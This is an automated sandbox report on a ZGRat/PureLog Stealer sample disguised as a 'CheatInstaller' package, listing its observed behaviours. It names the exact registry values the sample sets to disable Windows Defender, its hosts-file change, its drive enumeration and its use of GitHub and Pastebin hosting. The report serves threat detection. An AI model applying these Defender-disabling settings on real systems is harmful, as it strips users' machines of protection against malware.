Malware Analysis Report

2024-10-19 09:04

Sample ID 240318-x4seaaha4x
Target RUN.exe
SHA256 148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Tags
zgrat evasion rat trojan purelogstealer stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010

Threat Level: Known bad

The file RUN.exe was found to be: Known bad.

Malicious Activity Summary

zgrat evasion rat trojan purelogstealer stealer

Detect ZGRat V1

Modifies security service

ZGRat

PureLog Stealer payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies Windows Defender Real-time Protection settings

PureLog Stealer

Drops file in Drivers directory

Stops running service(s)

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Blocklisted process makes network request

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Runs ping.exe

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-18 19:24

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-18 19:24

Reported

2024-03-18 20:25

Platform

win11-20240221-en

Max time kernel

1800s

Max time network

1798s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

ZGRat

rat zgrat

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Stops running service(s)

evasion

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e577b3b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e577b3b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7C09.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI89A2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1F9C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e577b3f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4529.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7FC7.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFE829A4C255902E4C.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8913.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8A6F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8A7F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7CC6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7F77.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI452A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI455A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7BB8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7BE9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI22CA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFF3D577A100C7CC0E.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7BD8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8827.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7C19.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7FB6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI87E7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8962.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFAE7A98C7DCC56818.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF956BF8DD1AA65D97.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI87E6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI88C4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI89B2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI22CB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI452B.tmp C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
